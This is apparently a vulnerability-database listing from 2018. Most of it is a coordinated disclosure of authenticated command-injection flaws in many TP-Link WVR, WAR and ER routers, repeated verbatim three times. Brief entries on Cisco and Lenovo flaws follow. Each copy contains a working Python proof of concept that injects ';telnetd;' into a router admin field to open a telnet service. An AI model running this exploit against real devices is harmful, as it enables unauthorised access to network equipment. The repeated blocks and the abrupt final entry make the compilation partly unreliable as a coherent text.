TP-Link ER5510G,
TP-Link ER5520G,
TP-Link R4149G,
TP-Link R4239G,
TP-Link R4299G,
TP-Link R473GP-AC,
TP-Link R473G,
TP-Link R473P-AC,
TP-Link R473,
TP-Link R478G+,
TP-Link R478,
TP-Link R478+,
TP-Link R483G,
TP-Link R483,
TP-Link R488,
TP-Link WAR1300L,
TP-Link WAR1750L,
TP-Link WAR2600L,
TP-Link WAR302,
TP-Link WAR450L,
TP-Link WAR450,
TP-Link WAR458L,
TP-Link WAR458,
TP-Link WAR900L,
TP-Link WVR1300G,
TP-Link WVR1300L,
TP-Link WVR1750L,
TP-Link WVR2600L,
TP-Link WVR300,
TP-Link WVR302,
TP-Link WVR4300L,
TP-Link WVR450L,
TP-Link WVR450,
TP-Link WVR458L,
TP-Link WVR900G,
TP-Link WVR900L
CVE details:
================
The detail of each vulnerability are as follows:
CVE-2017-15613: new-interface variable in the cmxddns.lua file
CVE-2017-15614: new-outif variable in the pptp_client.lua file
CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file
CVE-2017-15616: new-interface variable in the phddns.lua file
CVE-2017-15617: iface variable in the interface_wan.lua file
CVE-2017-15618: new-enable variable in the pptp_client.lua file
CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file
CVE-2017-15620: new-zone variable in the ipmac_import.lua file
CVE-2017-15621: olmode variable in the interface_wan.lua file
CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file
CVE-2017-15623: new-enable variable in the pptp_server.lua file
CVE-2017-15624: new-authtype variable in the pptp_server.lua file
CVE-2017-15625: new-olmode variable in the pptp_client.lua file
CVE-2017-15626: new-bindif variable in the pptp_server.lua file
CVE-2017-15627: new-pns variable in the pptp_client.lua file
CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file
CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file
CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file
CVE-2017-15631: new-workmode variable in the pptp_client.lua file
CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file
CVE-2017-15633: new-ipgroup variable in the session_limits.lua file
CVE-2017-15634: name variable in the wportal.lua file
CVE-2017-15635: max_conn variable in the session_limits.lua file
CVE-2017-15636: new-time variable in the webfilter.lua file
CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file
Credits:
================
chunibalon, puzzor @VARAS of IIE
Timeline:
================
2017.08 to 2017.09: Issues found.
2017.09.26: Vendor contacted.
2017.10.13: Vendor confirmed.
2017.10.14: CVE id requested.
2017.10.19: CVE id assigned.
2018.1: Vendor confirmed that all effected products have been fixed.
Vulnerability detail:
================
These vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616.
Other vulnerabilities can be reproduced with the detail descriptions of the variable and lua file.
In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113:
***********************************
function add_phddns(http_form)
local form_data = json.decode(http_form.data)
local jdata = form_data.params.new
ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil)
if not ret then
return false, err.ERR_COM_TABLE_ITEM_UCI_ADD
end
if not uci_r:commit(CONFIG_NAME) then
return false, err.ERR_COM_UCI_COMMIT
end
-- add the ref of interface
ifs.update_if_reference(jdata.interface, 1)
sys.fork_exec('/etc/init.d/phddns restart')
userconfig.cfg_modify()
return jdata
end
***********************************
This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns".
The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently.
Then the malformed value of "interface" argument causes the command injection vulnerability.
PoC file:
================
***********************************
import requests
import urllib
import json
# This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616.
# To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin'
PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406'
BASEURL = 'http://192.168.123.1'
LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login'
MARK = '###'
VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK)
headers = {
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Host": BASEURL[7:],
"Origin": BASEURL,
"Referer": "%s/webpages/login.html" % (BASEURL),
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"X-Requested-With": "XMLHttpRequest"
}
login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}}
login_data = {'data':json.dumps(login_data_value)}
s = requests.Session()
s.headers.update(headers)
print (LOGINURL)
print (login_data)
res = s.post(LOGINURL, data=login_data)
stok = eval(res.text)['result']['stok']
print '[*] stok is %s' % (stok)
tmp_vul = VULURL.replace(MARK, stok)
print '[*] vul_url is %s ' % (tmp_vul)
delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}}
delete_data = {'data': json.dumps(delete_data)}
print '[+] delete existed rule'
res = s.post(tmp_vul, data=delete_data)
print '[*] response is: %s' % (res.text)
# after executing this payload, the router will open its telnetd service.
payload = ''';telnetd;'''
vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}}
vul_data = {'data': json.dumps(vul_data)}
print '[+] sending payload'
res = s.post(tmp_vul, data=vul_data)
print '[*] response is: %s' % (res.text)
***********************************
Reference:
================
https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt
| VAR-201801-0471 | CVE-2017-15619 | plural TP-Link Command injection vulnerability in devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the pptphellointerval variable in the pptp_client.lua file. TP-Link WVR , WAR ,and ER The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices.
These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled).
Vulnerability Type:
================
Command Injection (Authenticated)
Product:
================
We has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306).
And the following model should also be affected and the vendor has confirmed:
TP-Link ER5110G,
TP-Link ER5120G,
TP-Link ER5510G,
TP-Link ER5520G,
TP-Link R4149G,
TP-Link R4239G,
TP-Link R4299G,
TP-Link R473GP-AC,
TP-Link R473G,
TP-Link R473P-AC,
TP-Link R473,
TP-Link R478G+,
TP-Link R478,
TP-Link R478+,
TP-Link R483G,
TP-Link R483,
TP-Link R488,
TP-Link WAR1300L,
TP-Link WAR1750L,
TP-Link WAR2600L,
TP-Link WAR302,
TP-Link WAR450L,
TP-Link WAR450,
TP-Link WAR458L,
TP-Link WAR458,
TP-Link WAR900L,
TP-Link WVR1300G,
TP-Link WVR1300L,
TP-Link WVR1750L,
TP-Link WVR2600L,
TP-Link WVR300,
TP-Link WVR302,
TP-Link WVR4300L,
TP-Link WVR450L,
TP-Link WVR450,
TP-Link WVR458L,
TP-Link WVR900G,
TP-Link WVR900L
CVE details:
================
The detail of each vulnerability are as follows:
CVE-2017-15613: new-interface variable in the cmxddns.lua file
CVE-2017-15614: new-outif variable in the pptp_client.lua file
CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file
CVE-2017-15616: new-interface variable in the phddns.lua file
CVE-2017-15617: iface variable in the interface_wan.lua file
CVE-2017-15618: new-enable variable in the pptp_client.lua file
CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file
CVE-2017-15620: new-zone variable in the ipmac_import.lua file
CVE-2017-15621: olmode variable in the interface_wan.lua file
CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file
CVE-2017-15623: new-enable variable in the pptp_server.lua file
CVE-2017-15624: new-authtype variable in the pptp_server.lua file
CVE-2017-15625: new-olmode variable in the pptp_client.lua file
CVE-2017-15626: new-bindif variable in the pptp_server.lua file
CVE-2017-15627: new-pns variable in the pptp_client.lua file
CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file
CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file
CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file
CVE-2017-15631: new-workmode variable in the pptp_client.lua file
CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file
CVE-2017-15633: new-ipgroup variable in the session_limits.lua file
CVE-2017-15634: name variable in the wportal.lua file
CVE-2017-15635: max_conn variable in the session_limits.lua file
CVE-2017-15636: new-time variable in the webfilter.lua file
CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file
Credits:
================
chunibalon, puzzor @VARAS of IIE
Timeline:
================
2017.08 to 2017.09: Issues found.
2017.09.26: Vendor contacted.
2017.10.13: Vendor confirmed.
2017.10.14: CVE id requested.
2017.10.19: CVE id assigned.
2018.1: Vendor confirmed that all effected products have been fixed.
Vulnerability detail:
================
These vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616.
Other vulnerabilities can be reproduced with the detail descriptions of the variable and lua file.
In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113:
***********************************
function add_phddns(http_form)
local form_data = json.decode(http_form.data)
local jdata = form_data.params.new
ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil)
if not ret then
return false, err.ERR_COM_TABLE_ITEM_UCI_ADD
end
if not uci_r:commit(CONFIG_NAME) then
return false, err.ERR_COM_UCI_COMMIT
end
-- add the ref of interface
ifs.update_if_reference(jdata.interface, 1)
sys.fork_exec('/etc/init.d/phddns restart')
userconfig.cfg_modify()
return jdata
end
***********************************
This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns".
The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently.
Then the malformed value of "interface" argument causes the command injection vulnerability.
PoC file:
================
***********************************
import requests
import urllib
import json
# This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616.
# To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin'
PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406'
BASEURL = 'http://192.168.123.1'
LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login'
MARK = '###'
VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK)
headers = {
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Host": BASEURL[7:],
"Origin": BASEURL,
"Referer": "%s/webpages/login.html" % (BASEURL),
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"X-Requested-With": "XMLHttpRequest"
}
login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}}
login_data = {'data':json.dumps(login_data_value)}
s = requests.Session()
s.headers.update(headers)
print (LOGINURL)
print (login_data)
res = s.post(LOGINURL, data=login_data)
stok = eval(res.text)['result']['stok']
print '[*] stok is %s' % (stok)
tmp_vul = VULURL.replace(MARK, stok)
print '[*] vul_url is %s ' % (tmp_vul)
delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}}
delete_data = {'data': json.dumps(delete_data)}
print '[+] delete existed rule'
res = s.post(tmp_vul, data=delete_data)
print '[*] response is: %s' % (res.text)
# after executing this payload, the router will open its telnetd service.
payload = ''';telnetd;'''
vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}}
vul_data = {'data': json.dumps(vul_data)}
print '[+] sending payload'
res = s.post(tmp_vul, data=vul_data)
print '[*] response is: %s' % (res.text)
***********************************
Reference:
================
https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt
| VAR-201801-0556 | CVE-2017-15621 | plural TP-Link Command injection vulnerability in devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the olmode variable in the interface_wan.lua file. TP-Link WVR , WAR ,and ER The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices.
These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled).
Vulnerability Type:
================
Command Injection (Authenticated)
Product:
================
We has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306).
And the following model should also be affected and the vendor has confirmed:
TP-Link ER5110G,
TP-Link ER5120G,
TP-Link ER5510G,
TP-Link ER5520G,
TP-Link R4149G,
TP-Link R4239G,
TP-Link R4299G,
TP-Link R473GP-AC,
TP-Link R473G,
TP-Link R473P-AC,
TP-Link R473,
TP-Link R478G+,
TP-Link R478,
TP-Link R478+,
TP-Link R483G,
TP-Link R483,
TP-Link R488,
TP-Link WAR1300L,
TP-Link WAR1750L,
TP-Link WAR2600L,
TP-Link WAR302,
TP-Link WAR450L,
TP-Link WAR450,
TP-Link WAR458L,
TP-Link WAR458,
TP-Link WAR900L,
TP-Link WVR1300G,
TP-Link WVR1300L,
TP-Link WVR1750L,
TP-Link WVR2600L,
TP-Link WVR300,
TP-Link WVR302,
TP-Link WVR4300L,
TP-Link WVR450L,
TP-Link WVR450,
TP-Link WVR458L,
TP-Link WVR900G,
TP-Link WVR900L
CVE details:
================
The detail of each vulnerability are as follows:
CVE-2017-15613: new-interface variable in the cmxddns.lua file
CVE-2017-15614: new-outif variable in the pptp_client.lua file
CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file
CVE-2017-15616: new-interface variable in the phddns.lua file
CVE-2017-15617: iface variable in the interface_wan.lua file
CVE-2017-15618: new-enable variable in the pptp_client.lua file
CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file
CVE-2017-15620: new-zone variable in the ipmac_import.lua file
CVE-2017-15621: olmode variable in the interface_wan.lua file
CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file
CVE-2017-15623: new-enable variable in the pptp_server.lua file
CVE-2017-15624: new-authtype variable in the pptp_server.lua file
CVE-2017-15625: new-olmode variable in the pptp_client.lua file
CVE-2017-15626: new-bindif variable in the pptp_server.lua file
CVE-2017-15627: new-pns variable in the pptp_client.lua file
CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file
CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file
CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file
CVE-2017-15631: new-workmode variable in the pptp_client.lua file
CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file
CVE-2017-15633: new-ipgroup variable in the session_limits.lua file
CVE-2017-15634: name variable in the wportal.lua file
CVE-2017-15635: max_conn variable in the session_limits.lua file
CVE-2017-15636: new-time variable in the webfilter.lua file
CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file
Credits:
================
chunibalon, puzzor @VARAS of IIE
Timeline:
================
2017.08 to 2017.09: Issues found.
2017.09.26: Vendor contacted.
2017.10.13: Vendor confirmed.
2017.10.14: CVE id requested.
2017.10.19: CVE id assigned.
2018.1: Vendor confirmed that all effected products have been fixed.
Vulnerability detail:
================
These vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616.
Other vulnerabilities can be reproduced with the detail descriptions of the variable and lua file.
In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113:
***********************************
function add_phddns(http_form)
local form_data = json.decode(http_form.data)
local jdata = form_data.params.new
ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil)
if not ret then
return false, err.ERR_COM_TABLE_ITEM_UCI_ADD
end
if not uci_r:commit(CONFIG_NAME) then
return false, err.ERR_COM_UCI_COMMIT
end
-- add the ref of interface
ifs.update_if_reference(jdata.interface, 1)
sys.fork_exec('/etc/init.d/phddns restart')
userconfig.cfg_modify()
return jdata
end
***********************************
This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns".
The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently.
Then the malformed value of "interface" argument causes the command injection vulnerability.
PoC file:
================
***********************************
import requests
import urllib
import json
# This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616.
# To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin'
PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406'
BASEURL = 'http://192.168.123.1'
LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login'
MARK = '###'
VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK)
headers = {
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Host": BASEURL[7:],
"Origin": BASEURL,
"Referer": "%s/webpages/login.html" % (BASEURL),
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"X-Requested-With": "XMLHttpRequest"
}
login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}}
login_data = {'data':json.dumps(login_data_value)}
s = requests.Session()
s.headers.update(headers)
print (LOGINURL)
print (login_data)
res = s.post(LOGINURL, data=login_data)
stok = eval(res.text)['result']['stok']
print '[*] stok is %s' % (stok)
tmp_vul = VULURL.replace(MARK, stok)
print '[*] vul_url is %s ' % (tmp_vul)
delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}}
delete_data = {'data': json.dumps(delete_data)}
print '[+] delete existed rule'
res = s.post(tmp_vul, data=delete_data)
print '[*] response is: %s' % (res.text)
# after executing this payload, the router will open its telnetd service.
payload = ''';telnetd;'''
vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}}
vul_data = {'data': json.dumps(vul_data)}
print '[+] sending payload'
res = s.post(tmp_vul, data=vul_data)
print '[*] response is: %s' % (res.text)
***********************************
Reference:
================
https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt
| VAR-201801-0345 | CVE-2017-12308 | Cisco Small Business 300 Series and 500 In series managed switch software HTTP Response splitting vulnerability |
CVSS V2: 5.8 CVSS V3: 6.1 Severity: MEDIUM |
A vulnerability in the web framework of Cisco Small Business Managed Switches software could allow an unauthenticated, remote attacker to conduct an HTTP response splitting attack against a user of the web interface of an affected system. The vulnerability is due to insufficient input validation of some parameters that are passed to the web server of the affected system. An attacker could exploit this vulnerability by convincing a user to follow a malicious link or by intercepting a user request and injecting malicious code into the request. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected web interface or allow the attacker to access sensitive browser-based information. This vulnerability affects the following Cisco Small Business 300 and 500 Series Managed Switches: Cisco 350 Series Managed Switches, Cisco 350X Series Stackable Managed Switches, Cisco 550X Series Stackable Managed Switches, Cisco ESW2 Series Advanced Switches, Cisco Small Business 300 Series Managed Switches, Cisco Small Business 500 Series Stackable Managed Switches. Cisco Bug IDs: CSCvg29980. Vendors have confirmed this vulnerability Bug ID CSCvg29980 It is released as.Information may be obtained and information may be altered.
Attackers can leverage these issues to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into having a false sense of trust. are all switching devices of Cisco (Cisco)
| VAR-201801-0394 | CVE-2017-15613 | TP-Link WVR, WAR, and ER device arbitrary command execution vulnerability |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-interface variable in the cmxddns.lua file. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices
| VAR-201801-0472 | CVE-2017-15620 | plural TP-Link Command injection vulnerability in devices |
CVSS V2: 9.0 CVSS V3: 7.2 Severity: HIGH |
TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-zone variable in the ipmac_import.lua file. TP-Link WVR , WAR ,and ER The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices.
These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled).
Vulnerability Type:
================
Command Injection (Authenticated)
Product:
================
We has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306).
And the following model should also be affected and the vendor has confirmed:
TP-Link ER5110G,
TP-Link ER5120G,
TP-Link ER5510G,
TP-Link ER5520G,
TP-Link R4149G,
TP-Link R4239G,
TP-Link R4299G,
TP-Link R473GP-AC,
TP-Link R473G,
TP-Link R473P-AC,
TP-Link R473,
TP-Link R478G+,
TP-Link R478,
TP-Link R478+,
TP-Link R483G,
TP-Link R483,
TP-Link R488,
TP-Link WAR1300L,
TP-Link WAR1750L,
TP-Link WAR2600L,
TP-Link WAR302,
TP-Link WAR450L,
TP-Link WAR450,
TP-Link WAR458L,
TP-Link WAR458,
TP-Link WAR900L,
TP-Link WVR1300G,
TP-Link WVR1300L,
TP-Link WVR1750L,
TP-Link WVR2600L,
TP-Link WVR300,
TP-Link WVR302,
TP-Link WVR4300L,
TP-Link WVR450L,
TP-Link WVR450,
TP-Link WVR458L,
TP-Link WVR900G,
TP-Link WVR900L
CVE details:
================
The detail of each vulnerability are as follows:
CVE-2017-15613: new-interface variable in the cmxddns.lua file
CVE-2017-15614: new-outif variable in the pptp_client.lua file
CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file
CVE-2017-15616: new-interface variable in the phddns.lua file
CVE-2017-15617: iface variable in the interface_wan.lua file
CVE-2017-15618: new-enable variable in the pptp_client.lua file
CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file
CVE-2017-15620: new-zone variable in the ipmac_import.lua file
CVE-2017-15621: olmode variable in the interface_wan.lua file
CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file
CVE-2017-15623: new-enable variable in the pptp_server.lua file
CVE-2017-15624: new-authtype variable in the pptp_server.lua file
CVE-2017-15625: new-olmode variable in the pptp_client.lua file
CVE-2017-15626: new-bindif variable in the pptp_server.lua file
CVE-2017-15627: new-pns variable in the pptp_client.lua file
CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file
CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file
CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file
CVE-2017-15631: new-workmode variable in the pptp_client.lua file
CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file
CVE-2017-15633: new-ipgroup variable in the session_limits.lua file
CVE-2017-15634: name variable in the wportal.lua file
CVE-2017-15635: max_conn variable in the session_limits.lua file
CVE-2017-15636: new-time variable in the webfilter.lua file
CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file
Credits:
================
chunibalon, puzzor @VARAS of IIE
Timeline:
================
2017.08 to 2017.09: Issues found.
2017.09.26: Vendor contacted.
2017.10.13: Vendor confirmed.
2017.10.14: CVE id requested.
2017.10.19: CVE id assigned.
2018.1: Vendor confirmed that all effected products have been fixed.
Vulnerability detail:
================
These vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616.
Other vulnerabilities can be reproduced with the detail descriptions of the variable and lua file.
In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113:
***********************************
function add_phddns(http_form)
local form_data = json.decode(http_form.data)
local jdata = form_data.params.new
ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil)
if not ret then
return false, err.ERR_COM_TABLE_ITEM_UCI_ADD
end
if not uci_r:commit(CONFIG_NAME) then
return false, err.ERR_COM_UCI_COMMIT
end
-- add the ref of interface
ifs.update_if_reference(jdata.interface, 1)
sys.fork_exec('/etc/init.d/phddns restart')
userconfig.cfg_modify()
return jdata
end
***********************************
This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns".
The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently.
Then the malformed value of "interface" argument causes the command injection vulnerability.
PoC file:
================
***********************************
import requests
import urllib
import json
# This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616.
# To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin'
PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406'
BASEURL = 'http://192.168.123.1'
LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login'
MARK = '###'
VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK)
headers = {
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4",
"Connection": "keep-alive",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Host": BASEURL[7:],
"Origin": BASEURL,
"Referer": "%s/webpages/login.html" % (BASEURL),
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"X-Requested-With": "XMLHttpRequest"
}
login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}}
login_data = {'data':json.dumps(login_data_value)}
s = requests.Session()
s.headers.update(headers)
print (LOGINURL)
print (login_data)
res = s.post(LOGINURL, data=login_data)
stok = eval(res.text)['result']['stok']
print '[*] stok is %s' % (stok)
tmp_vul = VULURL.replace(MARK, stok)
print '[*] vul_url is %s ' % (tmp_vul)
delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}}
delete_data = {'data': json.dumps(delete_data)}
print '[+] delete existed rule'
res = s.post(tmp_vul, data=delete_data)
print '[*] response is: %s' % (res.text)
# after executing this payload, the router will open its telnetd service.
payload = ''';telnetd;'''
vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}}
vul_data = {'data': json.dumps(vul_data)}
print '[+] sending payload'
res = s.post(tmp_vul, data=vul_data)
print '[*] response is: %s' % (res.text)
***********************************
Reference:
================
https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt
| VAR-201801-0503 | CVE-2017-3765 | Lenovo Enterprise Networking Operating System Authentication vulnerability |
CVSS V2: 6.2 CVSS V3: 7.0 Severity: HIGH |
In Enterprise Networking Operating System (ENOS) in Lenovo and IBM RackSwitch and BladeCenter products, an authentication bypass known as "HP Backdoor" was discovered during a Lenovo security audit in the serial console, Telnet, SSH, and Web interfaces. This bypass mechanism can be accessed when performing local authentication under specific circumstances. If exploited, admin-level access to the switch is granted. Lenovo Enterprise Networking Operating System (ENOS) Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. LenovoRackSwitch and BladeCenter are China's Lenovo (Lenovo) switch products. IBMRackSwitch and BladeCenter are IBM's switch products. An authentication bypass vulnerability exists in ENOS in Lenovo, IBMRackSwitch, and BladeCenter switches. An attacker can use this vulnerability to gain access to the switch management interface and leak traffic through the switch, causing denial of service. Lenovo/IBM Products are prone to a local authentication-bypass vulnerability. This may lead to further attacks
| VAR-201801-1065 | CVE-2018-0118 | Cisco Unified Communications Manager Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
